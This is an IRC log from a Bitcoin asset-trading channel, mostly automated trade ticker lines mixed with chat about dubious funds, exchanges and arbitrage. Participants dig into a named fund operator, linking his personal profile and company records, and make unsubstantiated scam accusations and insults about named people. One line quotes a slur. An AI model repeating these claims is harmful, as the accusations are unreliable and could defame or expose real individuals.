BTC [-] Aug 15 20:04:31 the "ran a strange online psychotherapy thing" remarkably absent. Aug 15 20:04:42 http://companycheck.co.uk/company/04455464 The latest Annual Accounts submitted to Companies House for the year up to 30/11/2012 reported 'cash at bank' of £1,708, 'liabilities' worth £10,696, 'net worth' of £-3,317 and 'assets' worth £4,926. Mulhauser Consulting Ltd's risk score was amended on 13/02/2013. Aug 15 20:04:45 MULHAUSER CONSULTING LTD. Free business summary taken from official Companies House information. Fre Aug 15 20:04:54 i'd give it 50-50 odds to be a novel rendition of the classical uppity tortilla mental case. Aug 15 20:04:56 [HAVELOCK] [XBOND] 662 @ 0.0010581 = 0.7005 BTC [+] Aug 15 20:05:04 [HAVELOCK] [XBOND] 662 @ 0.0010581 = 0.7005 BTC [+] Aug 15 20:05:12 [HAVELOCK] [XBOND] 662 @ 0.0010581 = 0.7005 BTC [+] Aug 15 20:05:26 [HAVELOCK] [XBOND] 2000 @ 0.001054 = 2.108 BTC [-] Aug 15 20:05:37 [HAVELOCK] [XBOND] 25 @ 0.00105009 = 0.0263 BTC [-] Aug 15 20:06:43 maybe he could come on here Aug 15 20:07:07 If he can cure Tib Aug 15 20:07:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005186 = 0.1556 BTC [+] Aug 15 20:07:25 [BTCTC] [ACTIVEMINING] 68 @ 0.005187 = 0.3527 BTC [+] Aug 15 20:07:26 [BTCTC] [ACTIVEMINING] 2 @ 0.005191 = 0.0104 BTC [+] Aug 15 20:07:38 first IRC public therapy session Aug 15 20:07:56 im sure its been done before Aug 15 20:08:17 by a supposed real therapist Aug 15 20:08:47 [BTCTC] [DMS.MINING] 20 @ 0.003196 = 0.0639 BTC [+] Aug 15 20:09:08 not 2 guys in the basement crying about how they need better jobs Aug 15 20:09:25 #psychotherapy Aug 15 20:09:49 [BTCTC] [DMS.SELLING] 1 @ 0.01813 BTC [-] Aug 15 20:10:14 No one is in there. I am all alone! Aug 15 20:10:19 [BTCTC] [DMS.MINING] 56 @ 0.003197 = 0.179 BTC [+] Aug 15 20:10:20 [HAVELOCK] [XBOND] 72 @ 0.001051 = 0.0757 BTC [+] Aug 15 20:10:27 [HAVELOCK] [XBOND] 4 @ 0.001051 = 0.0042 BTC [+] Aug 15 20:10:34 solitude therapy. Aug 15 20:10:43 [BTCTC] [ACTIVEMINING] 2 @ 0.005199 = 0.0104 BTC [+] Aug 15 20:10:49 virtual isolation Aug 15 20:10:54 scrat will read the log later and be all omfg i didn't regfister it Aug 15 20:10:55 from his articles seems he does read btctalk. not sure if he's active, too, in relation to BTC-GROWTH or else Aug 15 20:12:03 im sure eventualyl he'll figure it out Aug 15 20:12:15 https://bitcointalk.org/index.php?action=profile;u=132160 Aug 15 20:12:19 [BTCTC] [PAJKA.BOND] 2 @ 0.015 = 0.03 BTC [+] Aug 15 20:12:20 [BTCTC] [PAJKA.BOND] 1 @ 0.015 BTC [+] Aug 15 20:12:21 hiar. Aug 15 20:12:21 View the profile of DrGregMulhauser Aug 15 20:12:29 https://www.facebook.com/greg.mulhauser?ref=br_rs&fref=browse_search << that's him Aug 15 20:12:35 mircea, didn't register what? Aug 15 20:12:52 btcgrowth.com is hosted on the same IP as mulhauser.net and psychologicalinvestor.com Aug 15 20:12:53 the channel Aug 15 20:13:18 unless someone used his photo for the profile, it's 100% him Aug 15 20:13:25 well doh. Aug 15 20:13:47 all domains registred via name.com Aug 15 20:14:11 going to send mpoe-pr after him? have to look for some 'corn Aug 15 20:14:28 3 people like his "offical" facebook page, a reverse search dumped 2 results.. one was a greg mulhauser. hm... :p Aug 15 20:14:30 [BTCTC] [BTC-GROWTH] 3 @ 0.09998 = 0.2999 BTC [+] Aug 15 20:14:42 dexX7 lol. Aug 15 20:14:53 It's probably the guy... doesn't mean it's all good. Aug 15 20:14:56 jurov not hardly. there's too many nuts and i only have one pr girl Aug 15 20:15:00 haha yea Aug 15 20:15:10 okay, spare her :) Aug 15 20:15:16 [BTCTC] [TAT.ASICMINER] 21 @ 0.03966 = 0.8329 BTC [-] Aug 15 20:15:17 [BTCTC] [TAT.ASICMINER] 7 @ 0.03964 = 0.2775 BTC [-] Aug 15 20:15:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.03955 = 0.791 BTC [-] Aug 15 20:15:19 drop him a "see here" link i guess Aug 15 20:15:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.0395 BTC [-] Aug 15 20:15:21 [BTCTC] [TAT.ASICMINER] 50 @ 0.03942 = 1.971 BTC [-] Aug 15 20:15:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.03942 BTC [-] Aug 15 20:15:27 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [+] Aug 15 20:16:00 [BTCTC] [RSM] 2 @ 0.0119 = 0.0238 BTC [+] Aug 15 20:18:12 :3 Aug 15 20:18:14 [HAVELOCK] [AM1] 1 @ 4.09 BTC [+] Aug 15 20:18:18 oops Aug 15 20:18:29 gd mouse Aug 15 20:19:00 :) Aug 15 20:20:14 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [+] Aug 15 20:20:15 [BTCTC] [ASICMINER-PT] 2 @ 3.924 = 7.848 BTC [+] Aug 15 20:21:27 [BTCTC] [LABCOIN] 7 @ 0.00168 = 0.0118 BTC [-] Aug 15 20:22:58 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001133 = 0.1133 BTC [+] Aug 15 20:24:54 [HAVELOCK] [SMG] 1216 @ 0.0001966 = 0.2391 BTC [+] Aug 15 20:24:56 [HAVELOCK] [SMG] 1216 @ 0.0001967 = 0.2392 BTC [+] Aug 15 20:24:59 [HAVELOCK] [SMG] 11011 @ 0.0002 = 2.2022 BTC [+] Aug 15 20:25:29 [BTCTC] [TAT.MINIGAME] 100 @ 0.000211 = 0.0211 BTC [-] Aug 15 20:25:30 [BTCTC] [TAT.MINIGAME] 13343 @ 0.00021 = 2.802 BTC [-] Aug 15 20:26:24 [BTCTC] [LABCOIN] 2 @ 0.001697 = 0.0034 BTC [+] Aug 15 20:26:24 [BTCTC] [LABCOIN] 20 @ 0.001698 = 0.034 BTC [+] Aug 15 20:26:25 [BTCTC] [LABCOIN] 100 @ 0.001705 = 0.1705 BTC [+] Aug 15 20:26:26 [BTCTC] [LABCOIN] 250 @ 0.001707 = 0.4268 BTC [+] Aug 15 20:26:47 [HAVELOCK] [XBOND] 677 @ 0.0010541 = 0.7136 BTC [+] Aug 15 20:26:53 [HAVELOCK] [XBOND] 1 @ 0.001054 BTC [-] Aug 15 20:27:53 [BTCTC] [LABCOIN] 1100 @ 0.001708 = 1.8788 BTC [+] Aug 15 20:31:32 so did smidge run? Aug 15 20:31:37 ;;seen smidge Aug 15 20:31:37 smidge was last seen in #bitcoin-assets 5 days, 20 hours, 46 minutes, and 13 seconds ago: why should i if theyre serious, i.e. not about push-ups and the like? Aug 15 20:32:06 see smidge run Aug 15 20:32:16 he got people to privately invest in he fund before his IPO, then cancelled his IPO Aug 15 20:32:24 the* Aug 15 20:33:54 i thought he called it off Aug 15 20:35:39 he called off the IPO, not the fund Aug 15 20:36:40 "Where we're going we don't need no IPO" -Smidge Aug 15 20:37:06 DISCLAIMER: I AM NOT SMIDGE. I AM ALSO NOT KEN. Aug 15 20:37:35 all this denial is suspicious Aug 15 20:39:37 [HAVELOCK] [XBOND] 1 @ 0.0010699 BTC [+] Aug 15 20:41:07 [BTCTC] [BITVPS] 3 @ 0.0032 = 0.0096 BTC [-] Aug 15 20:41:08 does this mean i can't give smidge all my money? Aug 15 20:42:04 I believe he is still collecting all of anyone's money. Aug 15 20:42:11 haha, great Aug 15 20:42:15 thought i missed the train Aug 15 20:42:40 quick, somebody post an address for me to send all my funds to Aug 15 20:42:51 pankkake werd Aug 15 20:43:02 how is xbonds selling over 105 Aug 15 20:43:04 [HAVELOCK] [AM100] 1 @ 0.0383 BTC [+] Aug 15 20:43:18 people forgot to read Aug 15 20:43:18 [BTCTC] [DMS.MINING] 50 @ 0.00299 = 0.1495 BTC [-] Aug 15 20:43:23 nubbins` 114CUXkbRDtnjtaoa1wzFkVnNHQw6fjvus Aug 15 20:43:55 am I being too hard on CFIG? Aug 15 20:44:03 no Aug 15 20:44:21 i just drew a cartoon to help myself try to understand Aug 15 20:44:50 [BTCTC] [NASTY-PT] 8 @ 0.00435 = 0.0348 BTC [-] Aug 15 20:44:59 then realized that if i transcribed the cartoon, i'd literally have everything they have Aug 15 20:45:03 i don't wanna ruin some poor guy's day due to language barrier Aug 15 20:45:46 [BTCTC] [DMS.PURCHASE] 73 @ 0.0208 = 1.5184 BTC [+] Aug 15 20:46:56 ;;ticker Aug 15 20:46:57 MtGox BTCUSD ticker | Best bid: 111.22998, Best ask: 111.23000, Bid-ask spread: 0.00002, Last trade: 111.22998, 24 hour volume: 18212.09019924, 24 hour low: 109.00000, 24 hour high: 115.00000, 24 hour vwap: 112.01123 Aug 15 20:46:57 link, nubbins`? Aug 15 20:47:07 ;;calc 150000000 / 111 Aug 15 20:47:07 1351351.35135 Aug 15 20:47:14 they say they have 10mil backing them, but are asking for 3mil for first year starting costs... i just.. i mean wtf Aug 15 20:47:15 1.3 million bitcoins Aug 15 20:47:18 heh Aug 15 20:47:38 Duffer1 yeah. Aug 15 20:48:06 and yes you want to ruin some poor dude's day. Aug 15 20:48:16 if you don't he's going to ruin a bunch of idiot's days for months. Aug 15 20:48:21 http://i.imgur.com/NLkeDAH.png Aug 15 20:48:44 just replace "CFIG" with an acronym of your choice Aug 15 20:48:59 pay a business student fifty bucks to write it out Aug 15 20:49:40 drunk old guy across the street just screamed "FAGGY!" at a crying infant Aug 15 20:49:59 So I did the math out Aug 15 20:50:13 its about $150 to do 100 megawatts of average output using next gen tech Aug 15 20:50:32 [BTCTC] [KENILWORTH] 1 @ 0.00175 BTC [-] Aug 15 20:50:36 huh? Aug 15 20:50:44 [BTCTC] [ACTIVEMINING] 1 @ 0.005111 BTC [-] Aug 15 20:50:52 lol nubbins I like the drawing Aug 15 20:51:06 in that case, send me all your btc Aug 15 20:51:15 it reminds me of how the times warner acquisition of myspace got started. Aug 15 20:51:30 [HAVELOCK] [XBOND] 17 @ 0.001051 = 0.0179 BTC [-] Aug 15 20:51:39 [HAVELOCK] [XBOND] 44 @ 0.00105001 = 0.0462 BTC [-] Aug 15 20:51:50 ha nubbins = cfig? Aug 15 20:51:54 :P Aug 15 20:52:13 its about $150 to do 100 megawatts of average output using next gen tech << what did you mean by this? Aug 15 20:52:20 [HAVELOCK] [XBOND] 3999 @ 0.00105 = 4.199 BTC [-] Aug 15 20:52:20 that would make this thread a lot weirder: https://bitcointalk.org/index.php?topic=269191.0 Aug 15 20:52:31 [HAVELOCK] [XBOND] 1000 @ 0.00105 = 1.05 BTC [-] Aug 15 20:52:40 sorry, $150m Aug 15 20:53:00 I sometimes do magnitudes in my head and forget to type them out Aug 15 20:54:46 how did you come up with that number? seems way low. Aug 15 20:55:41 were you looking more for $300m? Aug 15 20:56:06 coal is about $100/mwh iirc Aug 15 20:56:34 mircea_popescu: thats to pay for the coal, the plants cost much more than that Aug 15 20:56:43 maybe I don't understand what variables you're looking at. are you talking about building 100 MW of data center capacity to support the operations or are you talking about power consumption in mw-hr? Aug 15 20:56:45 natural gas about half, eco stuff about twice that Aug 15 20:57:04 Diablo-D3 well, no, it Aug 15 20:57:09 's fuel op costs amortisation Aug 15 20:57:11 http://bitbet.us/bet/467/usd-btc-exchange-rate-to-top-125-at-23-45/ hmmm Aug 15 20:57:16 BitBet - USD/BTC exchange rate to top $125 at 23:45 September 16, 2013 Aug 15 20:57:22 Urushiol: Im talking about power production Aug 15 20:57:32 ooh, ok Aug 15 20:58:20 the problem with the power generation sector though is that "next gen" isn't always right around the corner. Aug 15 20:59:07 [BTCTC] [BTC-GROWTH] 20 @ 0.09999 = 1.9998 BTC [+] Aug 15 20:59:09 [BTCTC] [BTC-GROWTH] 380 @ 0.1 = 38 BTC [+] Aug 15 20:59:29 at current prices, for example, $1.76 million per megawatt of nameplate capacity on wind turbines Aug 15 20:59:33 relative of mine is a project planner for a company big in nuclear power plant design and he was saying one day "oh yeah, we've got the construction of power plants down pat. we can turn them out really fast now". I asked "how fast is 'really fast'", to which he responded an underwhelming "about 10 years" Aug 15 20:59:55 Urushiol: next generation as in the current ones are being phased out of production Aug 15 21:00:00 [BTCTC] [TAT.ASICMINER] 24 @ 0.04021 = 0.965 BTC [+] Aug 15 21:00:02 Urushiol: same with solar Aug 15 21:02:07 what's refreshing in all this though is that people are finally looking at compute capacity they way they should have all along - from a power cost perspective. you have no idea how many higher-ups at data center companies out there don't know who pays the power bill or what it even is. Aug 15 21:02:22 Urushiol: heh that sfunny Aug 15 21:02:26 I did all that math last year Aug 15 21:02:36 decided it isnt worth buying into it yet Aug 15 21:02:40 [BTCTC] [ACTIVEMINING] 1 @ 0.005152 BTC [+] Aug 15 21:02:46 late 2014 or early 2015 will be much better Aug 15 21:02:58 [BTCTC] [ACTIVEMINING] 30 @ 0.005111 = 0.1533 BTC [-] Aug 15 21:03:26 [BTCTC] [ACTIVEMINING] 68 @ 0.005111 = 0.3475 BTC [-] Aug 15 21:03:35 [BTCTC] [BTC-GROWTH] 50 @ 0.1 = 5 BTC [+] Aug 15 21:03:47 [BTCTC] [ACTIVEMINING] 1 @ 0.005111 BTC [-] Aug 15 21:04:25 [BTCTC] [DMS.SELLING] 5 @ 0.01805 = 0.0903 BTC [-] Aug 15 21:04:52 [BTCTC] [ASICMINER-PT] 1 @ 3.923 BTC [-] Aug 15 21:05:26 [BTCTC] [TAT.ASICMINER] 11 @ 0.0402 = 0.4422 BTC [-] Aug 15 21:06:17 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 15 21:07:11 [BTCTC] [BITVPS] 1 @ 0.002903 BTC [-] Aug 15 21:07:21 [MPEX] [S.BBET] 2000 @ 0.00084999 = 1.7 BTC [-] Aug 15 21:08:14 [BTCTC] [ACTIVEMINING] 6 @ 0.00519 = 0.0311 BTC [+] Aug 15 21:08:16 [BTCTC] [ACTIVEMINING] 2 @ 0.005191 = 0.0104 BTC [+] Aug 15 21:08:30 [MPEX] [S.MG] 5000 @ 0.00019 = 0.95 BTC [+] Aug 15 21:12:16 who wanted to know if smidge ran off ? Aug 15 21:12:44 he lives! Aug 15 21:14:14 lol Aug 15 21:14:18 oh is there news? Aug 15 21:15:40 [BTCTC] [TAT.MINIGAME] 1 @ 0.000229 BTC [+] Aug 15 21:16:24 [BTCTC] [LABCOIN] 85 @ 0.001668 = 0.1418 BTC [-] Aug 15 21:16:24 [BTCTC] [LABCOIN] 20 @ 0.001667 = 0.0333 BTC [-] Aug 15 21:16:25 [BTCTC] [LABCOIN] 312 @ 0.001617 = 0.5045 BTC [-] Aug 15 21:16:27 [BTCTC] [LABCOIN] 10 @ 0.001617 = 0.0162 BTC [-] Aug 15 21:16:28 [BTCTC] [LABCOIN] 15 @ 0.001617 = 0.0243 BTC [-] Aug 15 21:16:29 [MPEX] [S.MPOE] 18705 @ 0.00086143 = 16.113 BTC [+] Aug 15 21:17:02 [BTCTC] [LABCOIN] 85 @ 0.001618 = 0.1375 BTC [+] Aug 15 21:17:04 [BTCTC] [LABCOIN] 20 @ 0.001617 = 0.0323 BTC [-] Aug 15 21:17:05 [BTCTC] [LABCOIN] 424 @ 0.001616 = 0.6852 BTC [-] Aug 15 21:18:17 Duffer1: http://thebitcoincompany.co.uk/buy-bitcoin-bourse-system-shares Aug 15 21:18:25 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [+] Aug 15 21:19:17 the dudes are for real and i bought some.. but don't take it as endorsement Aug 15 21:19:42 thebitcoin company ? Aug 15 21:20:21 [BTCTC] [DMS.MINING] 17 @ 0.00298 = 0.0507 BTC [-] Aug 15 21:20:25 brought to you by the bitcoin embassy? Aug 15 21:20:27 (heh) Aug 15 21:20:30 hehe Aug 15 21:20:38 [HAVELOCK] [AM100] 1 @ 0.0383 BTC [+] Aug 15 21:20:41 i still don't have my btc passport Aug 15 21:21:20 jurov they want me to log in to read their ipo.. Aug 15 21:21:39 what am i looking at? Aug 15 21:21:44 http://thebitcoincompany.co.uk/ipo/BitcoinBourse_IPO.pdf Aug 15 21:21:55 ah Aug 15 21:22:06 actual buying needs registration Aug 15 21:23:49 basically, there is some Markus Weiler who build few moderately successful btc enterprises such as thebitcoincard.co.uk Aug 15 21:23:56 but he really sucks at pr Aug 15 21:24:18 and getting useful info from his websites is a pain Aug 15 21:24:21 [MPEX] [S.MPOE] 17200 @ 0.00086143 = 14.8166 BTC [+] Aug 15 21:24:37 [BTCTC] [TAT.MINIGAME] 1 @ 0.000211 BTC [-] Aug 15 21:24:45 i see, i dunno about this one, newcomer exchanges have bitstamp to compete with Aug 15 21:24:59 so he got together with slovak trader/blogger martin belobrad and they are working on new btc exchange Aug 15 21:25:10 i don't want to bet against bitstamp, plus I'm a real damn small fish here :P Aug 15 21:25:34 it will be bitcoin.de -style with bitcoin-only escrow, they don't want to touch fiat Aug 15 21:26:06 their bet is that bitstamp will go deanonymizing route or have banking problems Aug 15 21:27:06 imo not unreasonable assumption Aug 15 21:27:11 [HAVELOCK] [CFIG] 5 @ 0.15 = 0.75 BTC Aug 15 21:27:21 (!) Aug 15 21:27:56 right but then they have mcxnow, cryptsy, coins-e, and vircurex to compete against Aug 15 21:28:30 let us a take a moment to mourn the death of .75B, you will be missed dear brother Aug 15 21:28:59 mhm i know only vircurex from this list and it really does anything with sepa transfers? Aug 15 21:29:34 my list was non-fiat related exchanges Aug 15 21:30:11 [BTCTC] [BTC-GROWTH] 21 @ 0.1 = 2.1 BTC [+] Aug 15 21:30:14 that's completely different thing, bitcoinbourse is btc/eur Aug 15 21:30:21 oh Aug 15 21:31:45 [BTCTC] [BTC-GROWTH] 1000 @ 0.1 = 100 BTC [+] Aug 15 21:32:15 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [+] Aug 15 21:32:30 [BTCTC] [DMS.MINING] 5 @ 0.00299 = 0.015 BTC [+] Aug 15 21:32:43 [BTCTC] [BITVPS] 1 @ 0.003249 BTC [+] Aug 15 21:32:45 [BTCTC] [BITVPS] 159 @ 0.00325 = 0.5168 BTC [+] Aug 15 21:32:53 [HAVELOCK] [XBOND] 1 @ 0.001045 BTC [-] Aug 15 21:33:26 [HAVELOCK] [XBOND] 1 @ 0.0010451 BTC [+] Aug 15 21:33:29 [HAVELOCK] [XBOND] 8 @ 0.001045 = 0.0084 BTC [-] Aug 15 21:34:17 [BTCTC] [DMS.SELLING] 1 @ 0.01805 BTC [-] Aug 15 21:34:26 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.001133 = 0.0045 BTC [+] Aug 15 21:35:01 [MPEX] [S.MPOE] 22202 @ 0.00086124 = 19.1213 BTC [-] Aug 15 21:35:07 [HAVELOCK] [XBOND] 386 @ 0.001045 = 0.4034 BTC [-] Aug 15 21:35:25 [HAVELOCK] [XBOND] 1 @ 0.001045 BTC [-] Aug 15 21:35:30 [BTCTC] [ACTIVEMINING] 1 @ 0.005209 BTC [+] Aug 15 21:45:59 lol Aug 15 21:46:02 [MPEX] [S.MPOE] 2600 @ 0.00086124 = 2.2392 BTC [-] Aug 15 21:46:53 reptilia dried out? Aug 15 21:47:48 months ago Aug 15 21:48:20 That was some entertaining stuff Aug 15 21:48:24 indeed. Aug 15 21:48:28 very well done trolling. Aug 15 21:49:04 yes, the "I left my laptop in the steam shower" lulz Aug 15 21:49:19 nono, it was the high security DESIGNATED area. Aug 15 21:49:26 ho yeah Aug 15 21:49:39 https://www.havelockinvestments.com/order.php?symbol=XBOND Aug 15 21:49:42 makes me think of that seinfeld episode when kramer gets some police tape Aug 15 21:49:43 bid is higher than ask Aug 15 21:49:47 and drops an egg and circles the spot Aug 15 21:49:49 Locked Aug 15 21:50:05 Hey the Spus lock sometimes too so go figure Aug 15 21:50:07 and they had a massive supposed room service bill , like a 100 grand Aug 15 21:50:18 I am laughing just thinking of it again Aug 15 21:51:11 [HAVELOCK] [AM100] 1 @ 0.03859999 BTC [+] Aug 15 21:51:19 oh yeah, and he sent some guy 10 btc? Aug 15 21:51:28 to prove he was not a troll? Aug 15 21:51:45 That was some good stuff Aug 15 21:51:56 <--offering Not Troll verification services, 10b Aug 15 21:52:34 [BTCTC] [LABCOIN] 1 @ 0.001649 BTC [+] Aug 15 21:52:52 [HAVELOCK] [XBOND] 24 @ 0.001045 = 0.0251 BTC [-] Aug 15 21:53:36 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 15 21:54:04 [HAVELOCK] [XBOND] 3 @ 0.001045 = 0.0031 BTC [-] Aug 15 21:54:41 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [+] Aug 15 21:57:01 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [+] Aug 15 21:57:23 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [+] Aug 15 21:57:32 [HAVELOCK] [AM100] 1 @ 0.03859999 BTC [+] Aug 15 21:59:38 [BTCTC] [LABCOIN] 18 @ 0.001644 = 0.0296 BTC [-] Aug 15 22:01:17 Hollywood no, he was proving that he's rich Aug 15 22:01:45 [HAVELOCK] [XBOND] 273 @ 0.0010458 = 0.2855 BTC [+] Aug 15 22:01:58 [BTCTC] [DMS.MINING] 1 @ 0.00299 BTC [+] Aug 15 22:02:01 [HAVELOCK] [XBOND] 273 @ 0.001045 = 0.2853 BTC [-] Aug 15 22:02:37 http://trilema.com/2013/lets-capture-forum-bugs-in-amber/ < after biting it with the silver trade. Aug 15 22:02:40 Let’s capture forum bugs in amber pe Trilema - Un blog de Mircea Popescu. Aug 15 22:02:42 [BTCTC] [B.YABMC] 25 @ 0.002749 = 0.0687 BTC [-] Aug 15 22:06:43 [HAVELOCK] [XBOND] 4 @ 0.0010459 = 0.0042 BTC [+] Aug 15 22:08:00 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.001152 = 0.0576 BTC [+] Aug 15 22:09:04 seen on facebook: I wanted my American friend to bring me an ASIC. He said: Aug 15 22:09:06 I worry they won't let me take it through customs... The USA is stopping Bitcoin production and it is practically a crime here. They have already frozen the assets of the largest American bitcoin repository... I tried to bring my bitcoin miner to Czech and ended up in a room for 90 minutes being interviewed by airport police... Aug 15 22:09:15 America is not the land of freedom it used to be... It has become more like nazi germany... Aug 15 22:09:32 Sadly Aug 15 22:09:37 (wasn't the text cut?) Aug 15 22:09:40 Time for a revolution Aug 15 22:11:46 [HAVELOCK] [XBOND] 43 @ 0.0010459 = 0.045 BTC [+] Aug 15 22:13:17 [BTCTC] [BTC-GROWTH] 20 @ 0.1 = 2 BTC [+] Aug 15 22:16:10 [HAVELOCK] [XBOND] 681 @ 0.0010472 = 0.7131 BTC [+] Aug 15 22:16:21 [HAVELOCK] [XBOND] 681 @ 0.0010472 = 0.7131 BTC [+] Aug 15 22:16:31 [HAVELOCK] [XBOND] 681 @ 0.0010471 = 0.7131 BTC [-] Aug 15 22:17:22 [HAVELOCK] [XBOND] 6 @ 0.00105 = 0.0063 BTC [+] Aug 15 22:17:38 [HAVELOCK] [XBOND] 94 @ 0.00105 = 0.0987 BTC [+] Aug 15 22:18:57 [HAVELOCK] [AM100] 20 @ 0.03859999 = 0.772 BTC [+] Aug 15 22:19:57 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 15 22:20:54 UGH so frustrated Aug 15 22:21:17 [BTCTC] [ACTIVEMINING] 3 @ 0.005175 = 0.0155 BTC [-] Aug 15 22:21:25 ;;later tell mircea_popescu thank you for the link. Aug 15 22:21:25 The operation succeeded. Aug 15 22:22:05 still on email from bitfunder or their wallet host weexchange to confirm my accounts/email. Its been 10+ hrs I would assume they aren't going to come. Aug 15 22:22:27 been trying to get a hold of their support in #bitfunder but still no luck. Aug 15 22:22:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.04002 = 0.4802 BTC [-] Aug 15 22:23:22 si did a little digging, the HashFast HQ is here Aug 15 22:23:27 http://nextspace.us/locationsandmembership/ Aug 15 22:23:52 [HAVELOCK] [XBOND] 100 @ 0.00105 = 0.105 BTC [+] Aug 15 22:24:11 [HAVELOCK] [XBOND] 36 @ 0.00105 = 0.0378 BTC [+] Aug 15 22:24:43 http://nextspace.us/nextspace-santa-cruz/ Aug 15 22:25:01 I wonder if they got the $50 membership or went up? Aug 15 22:25:43 [BTCTC] [BTC-GROWTH] 63 @ 0.1 = 6.3 BTC [+] Aug 15 22:26:57 [BTCTC] [BTC-GROWTH] 7 @ 0.1 = 0.7 BTC [+] Aug 15 22:27:26 Is this general stock chat? Aug 15 22:27:39 kind of. Aug 15 22:27:52 we talk about assets Aug 15 22:28:02 stocks, bonds, slaves Aug 15 22:28:03 etc Aug 15 22:28:04 Wasn't aware of any other asset IRC chats Aug 15 22:28:39 the20year yes yes, you found it. Aug 15 22:28:43 Joy! Aug 15 22:28:44 the20year we talk about stocks that's directly related to bitcoins, not Dollar or other fiat currency Aug 15 22:29:25 mostly we make ourselves feel better by criticizing others Aug 15 22:29:29 Does that include bitfunder assets that are primarily denominated in USD? :) Aug 15 22:29:44 ThickAsThieves some of you guys... Aug 15 22:29:59 hehe Aug 15 22:30:20 assbot took a short break Aug 15 22:30:28 I realized... this room should come with a warning Aug 15 22:30:32 time for some hookers. Aug 15 22:30:41 "Please note this chat is being logged for quality and training purpose" Aug 15 22:31:42 At any rate, i'm pretty excited to go look at property #2 for rentalstarter. Aug 15 22:32:24 the20year who are you again ? Aug 15 22:32:48 he runs RentalStarter Aug 15 22:32:55 flips houses Aug 15 22:33:05 paid for by bitcoin investors Aug 15 22:33:08 or wait Aug 15 22:33:14 weird model Aug 15 22:33:17 fixes house and rents them Aug 15 22:33:23 he might not flip em Aug 15 22:33:28 Helps as a BTC:USD hedge Aug 15 22:33:46 how many houses is that so faR ? Aug 15 22:33:49 Out of the 7 i'm looking at right now, one is a prime flip candidate, but i don't know if I want to sink that much cash into it Aug 15 22:33:51 i imagine anyone living in the US is hedged plenty on USD ;) Aug 15 22:33:54 1 house, looking for #2 right now Aug 15 22:34:05 the20year do yourself a favour get registered in the wot. Aug 15 22:34:05 yea man i get my salary in US Aug 15 22:34:24 I want my BTC investments with BTC exposure Aug 15 22:34:25 #wot kingofsports Aug 15 22:34:27 but hey im picky Aug 15 22:34:33 #rating kingofsports Aug 15 22:34:35 wot? Aug 15 22:34:38 ;;getrating kingofsports Aug 15 22:34:39 Use the gettrust command instead. See http://wiki.bitcoin-otc.com/wiki/OTC_Rating_System#Relying_on_the_rating Aug 15 22:34:51 heh. Aug 15 22:34:54 ;;getrating kingofsports Aug 15 22:34:54 Use the gettrust command instead. See http://wiki.bitcoin-otc.com/wiki/OTC_Rating_System#Relying_on_the_rating Aug 15 22:34:55 ;;gettrust kingofsports Aug 15 22:34:56 WARNING: Currently not authenticated. Trust relationship from user mircea_popescu to user kingofsports: Level 1: 0, Level 2: 0 via 0 connections. Graph: http://b-otc.com/stg?source=mircea_popescu&dest=kingofsports | WoT data: http://b-otc.com/vrd?nick=kingofsports Aug 15 22:34:56 wot is so 2012 Aug 15 22:35:04 it's all about forum trust now bro bro Aug 15 22:35:14 interesting in the OTC i have a couple things Aug 15 22:35:25 kingofsports probably nopt from anyone i know. Aug 15 22:35:35 trust me bro Aug 15 22:35:36 the20year http://wiki.bitcoin-otc.com/ Aug 15 22:35:46 nah prob not, i handle small business trades, $300-$2000, outside your range. Aug 15 22:35:52 not the 300 BTC average trade guy Aug 15 22:35:58 i just do arbitrage Aug 15 22:36:14 buy BTC at btc-e, sell for USD find buyer buy again and sell for mtgox -3% Aug 15 22:36:18 if everyone would just trust me, we would all be rich Aug 15 22:36:40 kingofsports not a crime. Aug 15 22:36:46 i know lol Aug 15 22:36:48 gecko_x2: what's your fund? Aug 15 22:36:56 kingofsports how do you get the USD into btc-e? Aug 15 22:37:03 dun have one yet Aug 15 22:37:04 :p Aug 15 22:37:10 @toffe i pay ppl for the bitcoin or btc-e codes. Aug 15 22:37:32 gotcha, never thought there was much of a liquid market for that Aug 15 22:37:47 I used to do the same -> btc-e when bitinstant was working, Aug 15 22:37:49 so far ive bought bout $2000 since i basically made my offerings official 4 days ago. Have a $1000 deal hopefully tonight for selling to complete the loop so far for $1500 netting bout $160. Aug 15 22:38:01 since their scuttle haven't found any other efficient way Aug 15 22:38:02 he hussles it basically. Aug 15 22:38:05 it's how markets are born Aug 15 22:38:19 Not bad king Aug 15 22:38:21 it makes money though and thats what matters :) Aug 15 22:38:27 Are you selling on otc or localbitcoins? Aug 15 22:38:34 I would hustle all day long if I could actually capture that $13 spread Aug 15 22:38:52 toffoo i heard that a few times past week or two hehe Aug 15 22:39:03 localbitcoins and bitcointalk. Woke up today and found dannyhamilton copied all my OPs Aug 15 22:39:05 lol Aug 15 22:39:09 well market prices don't lie, Aug 15 22:39:14 not happy but its bitcoin world, wild west so cant complain. Aug 15 22:39:16 so apparently there's no easy way to capture it Aug 15 22:39:17 except when they do Aug 15 22:39:27 kingofsports wait, what ?! Aug 15 22:39:50 i had my buying and selling threads laid out and he copied basically all the payment info and FAQ parts. Aug 15 22:39:59 link ? Aug 15 22:39:59 changed a small bit but its still mainly how my OPs look. Aug 15 22:40:38 buying thread for me https://bitcointalk.org/index.php?topic=272685.0 selling thread for me https://bitcointalk.org/index.php?topic=273774.0 Aug 15 22:40:58 my brother is big on localbitcoins Aug 15 22:41:08 I'm big in Japan. Aug 15 22:41:10 Danny's buying thread: https://bitcointalk.org/index.php?topic=274222.0 danny's selling thread https://bitcointalk.org/index.php?topic=274204.0 Aug 15 22:41:14 Trying to figure a way to get a nicer price as compared to 